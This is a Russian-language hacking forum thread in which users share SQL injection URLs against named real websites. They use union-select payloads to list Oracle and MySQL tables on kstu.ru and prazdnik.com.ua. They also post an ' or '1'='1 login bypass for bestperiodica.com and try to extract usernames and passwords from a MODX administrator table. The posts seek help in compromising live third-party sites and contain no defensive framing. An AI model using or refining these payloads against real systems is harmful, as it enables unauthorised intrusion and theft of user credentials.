заюзай дедик стоит 1-3 бакса

помогите плиз , с inj в oracle , а то че то не версию не чо вывести немогу)

Гнусный оракл

http://www.kstu.ru/al_spis_sotr.jsp?first=9'+union+select+null,table_ name,null,null,null,null,null+from+sys.all_tables--+

del

Microsoft JET Database
не как не могу подобрать таблицу =(

http://www.bestperiodica.com/Category.asp?cid=1+union+select+1+from+user

уверен ?
_http://forum.antichat.ru/threadnav50550-3-10.html

К MSysObjects доступа нет, так что только перебором

Кста там обход авторизации возможен http://www.bestperiodica.com/MyAccount.asp
В E-mail ' or '1'='1#
в пароль что угодно

короче, есть бажный сайт:
http://prazdnik.com.ua/index.php?id=54&pid=-3509'+union+select+1,2/*
в нем столько табличек:
http://prazdnik.com.ua/index.php?id=54&pid=-3509'+union+all+select+1,table_name+from+informati on_schema.tables+limit+86,1/*
самые интересные это:
modx_active_users -тридцатая
modx_manager_users -37
modx_web_users -66
из них получаем столбцы:
username
password
но когда я хочу просмотреть эти столбцы вводя например вот это:
http://prazdnik.com.ua/index.php?id=54&pid=-3509'+union+select+username,password+from+modx_man ager_users+limit+1,1/*
то никакого имени и пароля не получается!
может я не так что-то делаю, помогите кто может.